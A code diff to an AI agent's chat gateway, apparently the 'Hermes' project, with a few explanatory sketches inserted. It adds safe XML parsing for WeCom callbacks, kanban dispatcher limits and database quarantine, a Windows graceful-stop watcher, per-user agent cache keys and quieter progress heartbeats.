from xml.etree import ElementTree as ET
# Security: parse untrusted, pre-auth request bodies (WeCom callbacks) with
# defusedxml to block billion-laughs / entity-expansion (and XXE) DoS. The
# parsing API (fromstring) is a drop-in for the stdlib calls used below;
# response-building XML lives in wecom_crypto.py and is not parsed here.
try:
import defusedxml.ElementTree as ET
DEFUSEDXML_AVAILABLE = True
except ImportError:
ET = None # type: ignore[assignment]
DEFUSEDXML_AVAILABLE = False
try:
from aiohttp import web
@@ -49,7 +59,7 @@ MESSAGE_DEDUP_TTL_SECONDS = 300
def check_wecom_callback_requirements() -> bool:
return AIOHTTP_AVAILABLE and HTTPX_AVAILABLE
return AIOHTTP_AVAILABLE and HTTPX_AVAILABLE and DEFUSEDXML_AVAILABLE
class WecomCallbackAdapter(BasePlatformAdapter):
+408 -51
@@ -75,6 +75,7 @@ _TELEGRAM_NOISY_STATUS_RE = re.compile(
r"|configured\s+compression\s+model\s+.+\s+failed"
r"|no\s+auxiliary\s+llm\s+provider\s+configured"
r"|auto-lowered\s+compression\s+threshold"
r"|compacting\s+context\s+[—-]\s+summarizing\s+earlier\s+conversation"
r"|preflight\s+compression"
r"|rate\s+limited\.\s+waiting\s+\d"
r"|retrying\s+in\s+\d"
@@ -818,7 +819,6 @@ if _config_path.exists():
"singularity_image": "TERMINAL_SINGULARITY_IMAGE",
"modal_image": "TERMINAL_MODAL_IMAGE",
"daytona_image": "TERMINAL_DAYTONA_IMAGE",
"vercel_runtime": "TERMINAL_VERCEL_RUNTIME",
"ssh_host": "TERMINAL_SSH_HOST",
"ssh_user": "TERMINAL_SSH_USER",
"ssh_port": "TERMINAL_SSH_PORT",
@@ -831,6 +831,8 @@ if _config_path.exists():
"docker_env": "TERMINAL_DOCKER_ENV",
"docker_mount_cwd_to_workspace": "TERMINAL_DOCKER_MOUNT_CWD_TO_WORKSPACE",
"docker_run_as_host_user": "TERMINAL_DOCKER_RUN_AS_HOST_USER",
"docker_persist_across_processes": "TERMINAL_DOCKER_PERSIST_ACROSS_PROCESSES",
"docker_orphan_reaper": "TERMINAL_DOCKER_ORPHAN_REAPER",
"sandbox_dir": "TERMINAL_SANDBOX_DIR",
"persistent_shell": "TERMINAL_PERSISTENT_SHELL",
}
@@ -932,9 +934,14 @@ if _config_path.exists():
_redact = _security_cfg.get("redact_secrets")
if _redact is not None:
os.environ["HERMES_REDACT_SECRETS"] = str(_redact).lower()
# Gateway settings (media delivery allowlist + recency trust)
# Gateway settings (media delivery allowlist + recency trust + strict mode)
_gateway_cfg = _cfg.get("gateway", {})
if isinstance(_gateway_cfg, dict):
_strict = _gateway_cfg.get("strict")
if _strict is not None:
os.environ["HERMES_MEDIA_DELIVERY_STRICT"] = (
"1" if _strict else "0"
)
_allow_dirs = _gateway_cfg.get("media_delivery_allow_dirs")
if _allow_dirs:
if isinstance(_allow_dirs, str):
@@ -1078,14 +1085,19 @@ def _resolve_runtime_agent_kwargs() -> dict:
resolve_runtime_provider,
format_runtime_provider_error,
)
from hermes_cli.auth import AuthError
from hermes_cli.auth import AuthError, is_rate_limited_auth_error
try:
runtime = resolve_runtime_provider()
except AuthError as auth_exc:
# Primary provider auth failed (expired token, revoked key, etc.).
# Try the fallback provider chain before raising.
logger.warning("Primary provider auth failed: %s — trying fallback", auth_exc)
# Distinguish a transient rate-limit/quota cap (credentials are fine,
# re-auth cannot help) from a genuine auth failure (expired/revoked
# token). Both fall through to the fallback chain, but the log message
# must not mislabel a quota exhaustion as an auth failure (#32790).
if is_rate_limited_auth_error(auth_exc):
logger.warning("Primary provider rate-limited (429): %s — trying fallback", auth_exc)
else:
logger.warning("Primary provider auth failed: %s — trying fallback", auth_exc)
fb_config = _try_resolve_fallback_provider()
if fb_config is not None:
return fb_config
@@ -1131,9 +1143,13 @@ def _try_resolve_fallback_provider() -> dict | None:
explicit_base_url=entry.get("base_url"),
explicit_api_key=explicit_api_key,
)
# Log the literal `provider` key from config, not the resolved
# runtime category — an Ollama fallback resolves through the
# OpenAI-compatible path and would otherwise be logged as
# "openrouter", contradicting the operator's config (#32790).
logger.info(
"Fallback provider resolved: %s model=%s",
runtime.get("provider"),
entry.get("provider") or runtime.get("provider"),
entry.get("model"),
)
return {
@@ -3223,9 +3239,21 @@ class GatewayRunner:
self._busy_ack_ts[session_key] = now
# Build a status-rich acknowledgment
# Build a status-rich acknowledgment. Mobile chat defaults keep this
# terse; detailed iteration/tool state is still available in logs and
# can be opted in per platform via display.platforms.<platform>.busy_ack_detail.
from gateway.display_config import resolve_display_setting
status_parts = []
if running_agent and running_agent is not _AGENT_PENDING_SENTINEL:
busy_ack_detail_enabled = bool(
resolve_display_setting(
_load_gateway_config(),
_platform_config_key(event.source.platform),
"busy_ack_detail",
True,
)
)
if busy_ack_detail_enabled and running_agent and running_agent is not _AGENT_PENDING_SENTINEL:
try:
summary = running_agent.get_activity_summary()
iteration = summary.get("api_call_count", 0)
@@ -5392,6 +5420,49 @@ class GatewayRunner:
)
stale_timeout_seconds = 0
# Read kanban.default_assignee — fallback profile for tasks
# created without an explicit assignee (e.g. via the dashboard).
# When set, the dispatcher applies it to unassigned ready tasks
# instead of skipping them indefinitely (#27145). Empty string
# (the schema default) means "no fallback, keep skipping" —
# backward-compatible with existing installs.
default_assignee = (kanban_cfg.get("default_assignee") or "").strip() or None
if default_assignee:
logger.info(
"kanban dispatcher: default_assignee=%r (unassigned ready tasks "
"will route to this profile)",
default_assignee,
)
# Read kanban.max_in_progress_per_profile — per-profile concurrency
# cap (#21582). When set, no single profile gets more than N
# workers running at once, even if the global max_in_progress
# would allow it. Prevents one profile's local model / API quota
# / browser pool from being overwhelmed by a fan-out.
raw_per_profile = kanban_cfg.get("max_in_progress_per_profile", None)
max_in_progress_per_profile = None
if raw_per_profile is not None:
try:
max_in_progress_per_profile = int(raw_per_profile)
except (TypeError, ValueError):
logger.warning(
"kanban dispatcher: invalid kanban.max_in_progress_per_profile=%r; ignoring",
raw_per_profile,
)
max_in_progress_per_profile = None
else:
if max_in_progress_per_profile < 1:
logger.warning(
"kanban dispatcher: kanban.max_in_progress_per_profile=%r is below 1; ignoring",
raw_per_profile,
)
max_in_progress_per_profile = None
else:
logger.info(
"kanban dispatcher: max_in_progress_per_profile=%d",
max_in_progress_per_profile,
)
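The validation above can be read as one small function. The following is a minimal sketch, not the dispatcher's actual code: `parse_per_profile_cap` and `profile_at_cap` are hypothetical names introduced here, and the per-assignee running counts are assumed to arrive as a plain dict.

```python
import logging
from typing import Any, Dict, Optional

logger = logging.getLogger("kanban.sketch")


def parse_per_profile_cap(raw: Any) -> Optional[int]:
    """Return a positive int cap, or None when the value is unset or invalid."""
    if raw is None:
        return None
    try:
        cap = int(raw)
    except (TypeError, ValueError):
        logger.warning("invalid max_in_progress_per_profile=%r; ignoring", raw)
        return None
    if cap < 1:
        logger.warning("max_in_progress_per_profile=%r is below 1; ignoring", raw)
        return None
    return cap


def profile_at_cap(running: Dict[str, int], assignee: str, cap: Optional[int]) -> bool:
    """True when the assignee already has `cap` workers running (hypothetical helper)."""
    if cap is None:
        return False  # no per-profile cap configured
    return running.get(assignee, 0) >= cap
```

Treating an invalid value as "no cap" rather than raising keeps a typo in config.yaml from stopping the dispatcher.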
# Initial delay so the gateway finishes wiring adapters before the
# dispatcher spawns workers (those workers may hit gateway notify
# subscriptions etc.). Matches the notifier watcher's delay.
@@ -5403,7 +5474,13 @@ class GatewayRunner:
HEALTH_WINDOW = 6
bad_ticks = 0
last_warn_at = 0
disabled_corrupt_boards: dict[str, tuple[str, int | None, int | None]] = {}
# Avoid hot-looping corrupt-looking board DBs, but do not suppress
# same-fingerprint retries forever: transient WAL/open races can
# surface as "database disk image is malformed" for one tick.
CORRUPT_BOARD_RETRY_AFTER_SECONDS = 300
disabled_corrupt_boards: dict[
str, tuple[tuple[str, int | None, int | None], float]
] = {}
def _board_db_fingerprint(slug: str) -> tuple[str, int | None, int | None]:
path = _kb.kanban_db_path(slug)
@@ -5418,6 +5495,9 @@ class GatewayRunner:
return (resolved, stat.st_mtime_ns, stat.st_size)
def _is_corrupt_board_db_error(exc: Exception) -> bool:
corrupt_guard_error = getattr(_kb, "KanbanDbCorruptError", None)
if corrupt_guard_error is not None and isinstance(exc, corrupt_guard_error):
return True
if not isinstance(exc, sqlite3.DatabaseError):
return False
msg = str(exc).lower()
@@ -5437,14 +5517,27 @@ class GatewayRunner:
"""
conn = None
fingerprint = _board_db_fingerprint(slug)
disabled_fingerprint = disabled_corrupt_boards.get(slug)
if disabled_fingerprint == fingerprint:
return None
if disabled_fingerprint is not None:
logger.info(
"kanban dispatcher: board %s database changed; retrying dispatch",
slug,
)
disabled_entry = disabled_corrupt_boards.get(slug)
if disabled_entry is not None:
disabled_fingerprint, disabled_at = disabled_entry
age = time.monotonic() - disabled_at
if (
disabled_fingerprint == fingerprint
and age < CORRUPT_BOARD_RETRY_AFTER_SECONDS
):
return None
if disabled_fingerprint == fingerprint:
logger.info(
"kanban dispatcher: board %s database fingerprint unchanged "
"after %.0fs quarantine; retrying dispatch",
slug,
age,
)
else:
logger.info(
"kanban dispatcher: board %s database changed; retrying dispatch",
slug,
)
disabled_corrupt_boards.pop(slug, None)
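The quarantine check above pairs a file fingerprint with a monotonic timestamp. A minimal sketch of that decision, assuming a standalone helper (`should_skip_board` and the injectable `now` parameter are illustrative, not part of the patch):

```python
import time
from typing import Dict, Optional, Tuple

Fingerprint = Tuple[str, Optional[int], Optional[int]]
RETRY_AFTER_SECONDS = 300.0


def should_skip_board(
    quarantined: Dict[str, Tuple[Fingerprint, float]],
    slug: str,
    fingerprint: Fingerprint,
    now: Optional[float] = None,
) -> bool:
    """Return True while the board is still quarantined; otherwise clear the entry."""
    entry = quarantined.get(slug)
    if entry is None:
        return False
    old_fingerprint, disabled_at = entry
    now = time.monotonic() if now is None else now
    # Skip only when the file is unchanged AND the quarantine timer has not expired.
    if old_fingerprint == fingerprint and (now - disabled_at) < RETRY_AFTER_SECONDS:
        return True
    quarantined.pop(slug, None)
    return False
```

Using `time.monotonic()` rather than wall-clock time means a system clock adjustment cannot shorten or extend the quarantine.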
try:
conn = _kb.connect(board=slug)
@@ -5461,23 +5554,37 @@ class GatewayRunner:
max_in_progress=max_in_progress,
failure_limit=failure_limit,
stale_timeout_seconds=stale_timeout_seconds,
default_assignee=default_assignee,
max_in_progress_per_profile=max_in_progress_per_profile,
)
except sqlite3.DatabaseError as exc:
if _is_corrupt_board_db_error(exc):
disabled_corrupt_boards[slug] = fingerprint
disabled_corrupt_boards[slug] = (fingerprint, time.monotonic())
logger.error(
"kanban dispatcher: board %s database %s is not a valid "
"SQLite database; disabling dispatch for this board "
"until the file changes or the gateway restarts. Move "
"or restore the file, then run `hermes kanban init` if "
"you need a fresh board.",
"SQLite database; pausing dispatch for this board until "
"the file changes, the gateway restarts, or the "
"quarantine timer expires. Move or restore the file, "
"then run `hermes kanban init` if you need a fresh board.",
slug,
fingerprint[0],
)
return None
logger.exception("kanban dispatcher: tick failed on board %s", slug)
return None
except Exception:
except Exception as exc:
if _is_corrupt_board_db_error(exc):
disabled_corrupt_boards[slug] = (fingerprint, time.monotonic())
logger.error(
"kanban dispatcher: board %s database %s is not a valid "
"SQLite database; pausing dispatch for this board until "
"the file changes, the gateway restarts, or the "
"quarantine timer expires. Move or restore the file, "
"then run `hermes kanban init` if you need a fresh board.",
slug,
fingerprint[0],
)
return None
logger.exception("kanban dispatcher: tick failed on board %s", slug)
return None
finally:
@@ -5636,6 +5743,19 @@ class GatewayRunner:
"kanban dispatcher: embedded in gateway (interval=%.1fs)", interval
)
while self._running:
try:
# Reap zombie children before per-board work so a board DB
# failure cannot block cleanup of unrelated workers.
pids = await asyncio.to_thread(_kb.reap_worker_zombies)
if pids:
logger.info(
"kanban dispatcher: reaped %d zombie worker(s), pids=%s",
len(pids),
pids,
)
except Exception:
logger.exception("kanban dispatcher: zombie reaper failed")
try:
if auto_decompose_enabled:
await asyncio.to_thread(_auto_decompose_tick)
@@ -6294,7 +6414,7 @@ class GatewayRunner:
check_wecom_callback_requirements,
)
if not check_wecom_callback_requirements():
logger.warning("WeComCallback: aiohttp/httpx not installed")
logger.warning("WeComCallback: aiohttp/httpx/defusedxml not installed")
return None
return WecomCallbackAdapter(config)
@@ -7025,6 +7145,13 @@ class GatewayRunner:
if _denied is not None:
return _denied
# Telegram sends /start for bot launches/deep-links. Treat it as a
# platform ping, not a user command: no help dump, no agent
# interrupt, no queued text.
if _cmd_def_inner and _cmd_def_inner.name == "start":
logger.info("Ignoring /start platform ping for active session %s", _quick_key)
return ""
if _cmd_def_inner and _cmd_def_inner.name == "restart":
return await self._handle_restart_command(event)
@@ -7458,6 +7585,10 @@ class GatewayRunner:
if canonical == "help":
return await self._handle_help_command(event)
if canonical == "start":
logger.info("Ignoring /start platform ping for session %s", _quick_key)
return ""
if canonical == "commands":
return await self._handle_commands_command(event)
@@ -7938,7 +8069,8 @@ class GatewayRunner:
"🎤 I received your voice message but can't transcribe it — "
"no speech-to-text provider is configured.\n\n"
"To enable voice: install faster-whisper "
"(`pip install faster-whisper` in the Hermes venv) "
"(`uv pip install faster-whisper` in the Hermes venv; "
"`pip install faster-whisper` also works if pip is on PATH) "
"and set `stt.enabled: true` in config.yaml, "
"then /restart the gateway."
)
@@ -10161,8 +10293,16 @@ class GatewayRunner:
raw_args = event.get_command_args().strip()
# Parse --provider and --global flags
model_input, explicit_provider, persist_global = parse_model_flags(raw_args)
# Parse --provider, --global, and --refresh flags
model_input, explicit_provider, persist_global, force_refresh = parse_model_flags(raw_args)
# --refresh: bust the disk cache so the picker shows live data.
if force_refresh:
try:
from hermes_cli.models import clear_provider_models_cache
clear_provider_models_cache()
except Exception:
pass
# Read current model/provider from config
current_model = ""
@@ -11736,6 +11876,7 @@ class GatewayRunner:
session_id=task_id,
platform=platform_key,
user_id=source.user_id,
user_id_alt=source.user_id_alt,
user_name=source.user_name,
chat_id=source.chat_id,
chat_name=source.chat_name,
@@ -13339,6 +13480,40 @@ class GatewayRunner:
else:
lines.append(t("gateway.reload_mcp.tools_available", tools=len(new_tools), servers=len(connected_servers)))
# Refresh cached agents so existing sessions see new MCP tools on
# their next turn — without this, the user has to `/new` (which
# discards conversation history) to pick up tools from a server
# that was just added or reconnected. The user has already
# consented to the prompt-cache invalidation via the slash-confirm
# gate in _handle_reload_mcp_command before we reach this point.
try:
from model_tools import get_tool_definitions
_cache = getattr(self, "_agent_cache", None)
_cache_lock = getattr(self, "_agent_cache_lock", None)
if _cache_lock is not None and _cache:
with _cache_lock:
for _sess_key, _entry in list(_cache.items()):
try:
_agent = _entry[0] if isinstance(_entry, tuple) else _entry
except Exception:
continue
if _agent is None:
continue
new_defs = get_tool_definitions(
enabled_toolsets=getattr(_agent, "enabled_toolsets", None),
disabled_toolsets=getattr(_agent, "disabled_toolsets", None),
quiet_mode=True,
)
_agent.tools = new_defs
_agent.valid_tool_names = {
t["function"]["name"] for t in new_defs
} if new_defs else set()
except Exception as _exc:
logger.debug(
"Failed to update cached agent tools after MCP reload: %s",
_exc,
)
# Inject a message at the END of the session history so the
# model knows tools changed on its next turn. Appended after
# all existing messages to preserve prompt-cache for the prefix.
@@ -15004,6 +15179,29 @@ class GatewayRunner:
out["tools.registry_generation"] = getattr(registry, "_generation", None)
except Exception:
out["tools.registry_generation"] = None
# Honcho identity-mapping keys live in honcho.json, not user_config.
# HonchoSessionManager freezes the resolved peer_name / ai_peer /
# pin / aliases / prefix at construction; without busting here,
# mid-flight honcho.json edits go unread until the next unrelated
# cache eviction.
try:
from plugins.memory.honcho.client import HonchoClientConfig
hcfg = HonchoClientConfig.from_global_config()
out["honcho.peer_name"] = hcfg.peer_name
out["honcho.ai_peer"] = hcfg.ai_peer
out["honcho.pin_peer_name"] = bool(hcfg.pin_peer_name)
out["honcho.runtime_peer_prefix"] = hcfg.runtime_peer_prefix or ""
aliases = hcfg.user_peer_aliases or {}
out["honcho.user_peer_aliases"] = sorted(aliases.items()) if isinstance(aliases, dict) else []
except Exception:
out["honcho.peer_name"] = None
out["honcho.ai_peer"] = None
out["honcho.pin_peer_name"] = None
out["honcho.runtime_peer_prefix"] = None
out["honcho.user_peer_aliases"] = None
return out
@staticmethod
@@ -15013,6 +15211,8 @@ class GatewayRunner:
enabled_toolsets: list,
ephemeral_prompt: str,
cache_keys: dict | None = None,
user_id: str | None = None,
user_id_alt: str | None = None,
) -> str:
"""Compute a stable string key from agent config values.
@@ -15026,6 +15226,20 @@ class GatewayRunner:
the output of ``_extract_cache_busting_config(user_config)`` so
edits to model.context_length / compression.* in config.yaml are
picked up on the next gateway message without a manual restart.
``user_id`` and ``user_id_alt`` are the runtime user identities
carried by the current message's gateway source. They participate
in the cache key because the Honcho memory provider freezes them
into ``HonchoSessionManager`` at first-message init (see
``plugins/memory/honcho/__init__.py::_do_session_init``). Without
them in the signature, a shared-thread session_key (one in which
``build_session_key`` intentionally omits the participant ID,
e.g. ``thread_sessions_per_user=False``) would reuse the cached
AIAgent across distinct users, causing the second user's messages
to be attributed to the first user's resolved Honcho peer. This
broke #27371's per-user-peer contract in multi-user gateways.
Per-user agent rebuilds in shared threads trade prompt-cache
warmth for correct memory attribution.
"""
import hashlib, json as _j
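To illustrate why the user identities belong in the signature, here is a reduced sketch. `agent_signature` and its short argument list are assumptions for illustration; the real method hashes more fields than shown here.

```python
import hashlib
import json
from typing import List, Optional


def agent_signature(
    model: str,
    toolsets: List[str],
    user_id: Optional[str] = None,
    user_id_alt: Optional[str] = None,
) -> str:
    """Hash the config values plus the runtime user identities into a cache key."""
    payload = json.dumps(
        [model, sorted(toolsets), str(user_id or ""), str(user_id_alt or "")],
        sort_keys=True,
        default=str,
    )
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()[:16]
```

Two users in the same shared thread now produce different keys, so the second user gets a freshly built agent instead of the first user's cached one.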
@@ -15050,6 +15264,8 @@ class GatewayRunner:
# cached agent and doesn't affect system prompt or tools.
ephemeral_prompt or "",
_cache_keys_sorted,
str(user_id or ""),
str(user_id_alt or ""),
],
sort_keys=True,
default=str,
@@ -15829,9 +16045,13 @@ class GatewayRunner:
# in chat platforms while opting into concise mid-turn updates.
interim_assistant_messages_enabled = (
source.platform != Platform.WEBHOOK
and is_truthy_value(
display_config.get("interim_assistant_messages"),
default=True,
and bool(
resolve_display_setting(
user_config,
platform_key,
"interim_assistant_messages",
True,
)
)
)
@@ -15844,7 +16064,7 @@ class GatewayRunner:
# Auto-cleanup of temporary progress bubbles (Telegram + any adapter
# that implements ``delete_message``). When enabled via
# ``display.platforms.<platform>.cleanup_progress: true``, message IDs
# from the tool-progress / "Still working..." / status-callback bubbles
# from the tool-progress / "⏳ Working — N min" / status-callback bubbles
# are collected here and deleted after the final response lands.
# Failed runs skip cleanup so the bubbles remain as breadcrumbs.
_cleanup_progress = bool(
@@ -16587,6 +16807,8 @@ class GatewayRunner:
enabled_toolsets,
combined_ephemeral,
cache_keys=self._extract_cache_busting_config(user_config),
user_id=getattr(source, "user_id", None),
user_id_alt=getattr(source, "user_id_alt", None),
)
agent = None
_cache_lock = getattr(self, "_agent_cache_lock", None)
@@ -16630,6 +16852,7 @@ class GatewayRunner:
session_id=session_id,
platform=platform_key,
user_id=source.user_id,
user_id_alt=source.user_id_alt,
user_name=source.user_name,
chat_id=source.chat_id,
chat_name=source.chat_name,
@@ -17368,6 +17591,15 @@ class GatewayRunner:
# 0 = disable notifications.
_NOTIFY_INTERVAL_RAW = _float_env("HERMES_AGENT_NOTIFY_INTERVAL", 180)
_NOTIFY_INTERVAL = _NOTIFY_INTERVAL_RAW if _NOTIFY_INTERVAL_RAW > 0 else None
if not bool(
resolve_display_setting(
user_config,
platform_key,
"long_running_notifications",
True,
)
):
_NOTIFY_INTERVAL = None
_notify_start = time.time()
async def _notify_long_running():
@@ -17376,35 +17608,69 @@ class GatewayRunner:
_notify_adapter = self.adapters.get(source.platform)
if not _notify_adapter:
return
# Track the heartbeat message id so we can edit-in-place on
# platforms that support it (Telegram, Discord, Slack, etc.)
# instead of spamming a new "Still working" bubble every
# interval. Falls back to send-new when edit fails or isn't
# supported by the adapter.
_heartbeat_msg_id: Optional[str] = None
while True:
await asyncio.sleep(_NOTIFY_INTERVAL)
_elapsed_mins = int((time.time() - _notify_start) // 60)
# Include agent activity context if available.
# Include agent activity context if available. Default
# heartbeat is terse: elapsed + current tool. Verbose
# iteration counter is gated on busy_ack_detail so users
# who want it can opt in per platform.
_agent_ref = agent_holder[0]
_status_detail = ""
_want_iteration_detail = bool(
resolve_display_setting(
user_config,
platform_key,
"busy_ack_detail",
True,
)
)
if _agent_ref and hasattr(_agent_ref, "get_activity_summary"):
try:
_a = _agent_ref.get_activity_summary()
_parts = [f"iteration {_a['api_call_count']}/{_a['max_iterations']}"]
if _a.get("current_tool"):
_parts.append(f"running: {_a['current_tool']}")
else:
_parts.append(_a.get("last_activity_desc", ""))
_status_detail = "" + ", ".join(_parts)
_parts = []
if _want_iteration_detail:
_parts.append(
f"iteration {_a['api_call_count']}/{_a['max_iterations']}"
)
_action = _a.get("current_tool") or _a.get("last_activity_desc")
if _action:
_parts.append(str(_action))
if _parts:
_status_detail = "" + ", ".join(_parts)
except Exception:
pass
_heartbeat_text = f"⏳ Working — {_elapsed_mins} min{_status_detail}"
try:
_notify_res = await _notify_adapter.send(
source.chat_id,
f"⏳ Still working... ({_elapsed_mins} min elapsed{_status_detail})",
metadata=_status_thread_metadata,
)
if (
_cleanup_progress
and getattr(_notify_res, "success", False)
and getattr(_notify_res, "message_id", None)
):
_cleanup_msg_ids.append(str(_notify_res.message_id))
_notify_res = None
if _heartbeat_msg_id:
try:
_notify_res = await _notify_adapter.edit_message(
source.chat_id,
_heartbeat_msg_id,
_heartbeat_text,
)
except Exception as _ee:
logger.debug("Heartbeat edit failed: %s", _ee)
_notify_res = None
if not (_notify_res and getattr(_notify_res, "success", False)):
_notify_res = await _notify_adapter.send(
source.chat_id,
_heartbeat_text,
metadata=_status_thread_metadata,
)
if getattr(_notify_res, "success", False) and getattr(
_notify_res, "message_id", None
):
_heartbeat_msg_id = str(_notify_res.message_id)
if _cleanup_progress:
_cleanup_msg_ids.append(_heartbeat_msg_id)
except Exception as _ne:
logger.debug("Long-running notification error: %s", _ne)
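The edit-in-place flow above reduces to "try to edit, fall back to send". A minimal sketch with a stand-in adapter follows; `FakeAdapter`, `SendResult`, and `heartbeat` are hypothetical names, and the real adapter methods take more arguments (for example `metadata`).

```python
import asyncio
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class SendResult:
    success: bool
    message_id: Optional[str] = None


class FakeAdapter:
    """Hypothetical adapter that records calls so the flow can be observed."""

    def __init__(self, edit_ok: bool = True) -> None:
        self.edit_ok = edit_ok
        self.calls: List[Tuple[str, str]] = []
        self._next_id = 0

    async def send(self, chat_id: str, text: str) -> SendResult:
        self._next_id += 1
        self.calls.append(("send", text))
        return SendResult(True, str(self._next_id))

    async def edit_message(self, chat_id: str, message_id: str, text: str) -> SendResult:
        self.calls.append(("edit", text))
        if not self.edit_ok:
            raise RuntimeError("edit not supported")
        return SendResult(True, message_id)


async def heartbeat(adapter, chat_id: str, text: str, msg_id: Optional[str]) -> Optional[str]:
    """Edit the previous heartbeat if possible, else send a new one."""
    result = None
    if msg_id:
        try:
            result = await adapter.edit_message(chat_id, msg_id, text)
        except Exception:
            result = None  # fall through to a fresh send
    if not (result and result.success):
        result = await adapter.send(chat_id, text)
    if result.success and result.message_id:
        return str(result.message_id)
    return msg_id


async def demo(edit_ok: bool) -> List[str]:
    adapter = FakeAdapter(edit_ok=edit_ok)
    msg_id = await heartbeat(adapter, "chat", "Working, 3 min", None)
    await heartbeat(adapter, "chat", "Working, 6 min", msg_id)
    return [kind for kind, _ in adapter.calls]
```

With a working `edit_message` the chat shows one bubble that updates; when editing raises, each tick degrades to a new message.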
@@ -17987,6 +18253,72 @@ class GatewayRunner:
return response
def _run_planned_stop_watcher(
stop_event: threading.Event,
runner,
loop: asyncio.AbstractEventLoop,
shutdown_handler,
*,
poll_interval: float = 0.5,
) -> None:
"""Poll for the planned-stop marker and trigger graceful shutdown.
On Windows, ``asyncio.add_signal_handler`` raises NotImplementedError
for SIGTERM/SIGINT, so the standard signal-driven shutdown path
never runs when ``hermes gateway stop`` signals the gateway. The
consequence is that the drain loop is skipped: in-flight agent
sessions are killed mid-turn and ``resume_pending`` is never set,
so the next gateway boot has no idea those sessions need to be
auto-resumed (issue #33778, v0.13.0 session-resume feature broken
on native Windows).
This watcher runs on every platform (cheap, defensive) and bridges
the gap on Windows by translating a filesystem marker into the
same shutdown-handler invocation a real SIGTERM would have produced
on POSIX. The CLI's ``hermes_cli.gateway_windows.stop()`` writes
the marker via ``write_planned_stop_marker(pid)`` and then waits
for the gateway PID to exit; this watcher is what makes that
exit happen cleanly.
On POSIX this is a no-op safety net: the signal handler always
beats us to consuming the marker file because it fires synchronously
from the kernel's signal delivery.
Args:
stop_event: set by start_gateway() during normal shutdown
to tell the watcher to exit.
runner: the GatewayRunner instance; we check ``_running`` and
``_draining`` so shutdown is only triggered while the gateway
is running and not already draining.
loop: the asyncio event loop the shutdown handler must run on.
shutdown_handler: same callable that's wired to SIGTERM —
tolerates a ``None`` signal argument (planned stop case)
and consumes the marker via
``consume_planned_stop_marker_for_self()``.
poll_interval: seconds between marker checks. 0.5s gives a
responsive shutdown without burning CPU.
"""
from gateway.status import _get_planned_stop_marker_path
marker_path = _get_planned_stop_marker_path()
while not stop_event.is_set():
try:
if (
marker_path.exists()
and not getattr(runner, "_draining", False)
and getattr(runner, "_running", False)
):
# Drive the same path as a real signal handler.
# Pass signal=None — the handler tolerates that and consumes
# the marker via consume_planned_stop_marker_for_self,
# which also validates target_pid + start_time match us.
loop.call_soon_threadsafe(shutdown_handler, None)
# Done: the handler will set _draining; exit the watcher now.
break
except Exception as _e:
logger.debug("Planned-stop watcher tick error: %s", _e)
stop_event.wait(poll_interval)
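The marker-polling idea can be tried in isolation. This sketch is an assumption-laden reduction: `watch_marker` and `demo` are hypothetical, the marker lives in a temporary directory, and the callback runs directly on the watcher thread, whereas the function above hands it to the event loop with `loop.call_soon_threadsafe`.

```python
import tempfile
import threading
from pathlib import Path
from typing import Callable


def watch_marker(
    stop_event: threading.Event,
    marker: Path,
    on_stop: Callable[[], None],
    poll_interval: float = 0.05,
) -> None:
    """Poll for the marker file; fire the callback once, then exit."""
    while not stop_event.is_set():
        if marker.exists():
            on_stop()
            break
        # Event.wait doubles as an interruptible sleep.
        stop_event.wait(poll_interval)


def demo() -> bool:
    fired = threading.Event()
    stop = threading.Event()
    with tempfile.TemporaryDirectory() as tmp:
        marker = Path(tmp) / "planned-stop"
        thread = threading.Thread(
            target=watch_marker, args=(stop, marker, fired.set), daemon=True
        )
        thread.start()
        marker.write_text("stop")  # what the CLI's stop command would do
        ok = fired.wait(timeout=2.0)
        stop.set()
        thread.join(timeout=2.0)
    return ok
```

Waiting on the stop event instead of calling `time.sleep` lets shutdown wake the thread immediately rather than after a full poll interval.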
def _start_cron_ticker(stop_event: threading.Event, adapters=None, loop=None, interval: int = 60):
"""
Background thread that ticks the cron scheduler at a regular interval.
@@ -18391,7 +18723,28 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
pass
else:
logger.info("Skipping signal handlers (not running in main thread).")
# Windows fallback: asyncio.add_signal_handler raises NotImplementedError
# on Windows, so `hermes gateway stop`'s SIGTERM (which Python maps to
# TerminateProcess on Windows) never invokes shutdown_signal_handler.
# That means the drain loop never runs, mark_resume_pending never fires,
# and sessions are silently lost across restarts (issue #33778).
#
# The fix is a marker-polling thread: `hermes gateway stop` writes the
# planned-stop marker BEFORE killing, and this thread notices it and
# drives the same shutdown path the signal handler would have. Runs
# on every platform (cheap, defensive) so non-signal-bearing
# environments (Windows native, sandboxed CI runners that mask
# SIGTERM) still get a clean drain.
_planned_stop_watcher_stop = threading.Event()
_planned_stop_watcher_thread = threading.Thread(
target=_run_planned_stop_watcher,
args=(_planned_stop_watcher_stop, runner, loop, shutdown_signal_handler),
daemon=True,
name="planned-stop-watcher",
)
_planned_stop_watcher_thread.start()
# Claim the PID file BEFORE bringing up any platform adapters.
# This closes the --replace race window: two concurrent `gateway run
# --replace` invocations both pass the termination-wait above, but
@@ -18469,6 +18822,10 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
cron_stop.set()
cron_thread.join(timeout=5)
# Stop the planned-stop watcher (daemon=True so this is belt-and-suspenders).
_planned_stop_watcher_stop.set()
_planned_stop_watcher_thread.join(timeout=2)
# Close MCP server connections
try:
from tools.mcp_tool import shutdown_mcp_servers
+14 -9
@@ -552,11 +552,6 @@ class GatewayStreamConsumer:
self._last_edit_time = time.monotonic()
if got_done:
# Record that the final content reached the user even
# if the cosmetic final edit below fails.
if current_update_visible and self._accumulated:
self._final_content_delivered = True
# Final edit without cursor. If progressive editing failed
# mid-stream, send a single continuation/fallback message
# here instead of letting the base gateway path send the
@@ -573,6 +568,7 @@ class GatewayStreamConsumer:
# final edit — but only for adapters that don't
# need an explicit finalize signal.
self._final_response_sent = True
self._final_content_delivered = True
elif self._message_id:
# Either the mid-stream edit didn't run (no
# visible update this tick) OR the adapter needs
@@ -580,8 +576,12 @@ class GatewayStreamConsumer:
self._final_response_sent = await self._send_or_edit(
self._accumulated, finalize=True,
)
if self._final_response_sent:
self._final_content_delivered = True
elif not self._already_sent:
self._final_response_sent = await self._send_or_edit(self._accumulated)
if self._final_response_sent:
self._final_content_delivered = True
return
if commentary_text is not None:
@@ -641,6 +641,7 @@ class GatewayStreamConsumer:
# "Let me search…") had been delivered, not the real answer.
if _best_effort_ok and not self._final_response_sent:
self._final_response_sent = True
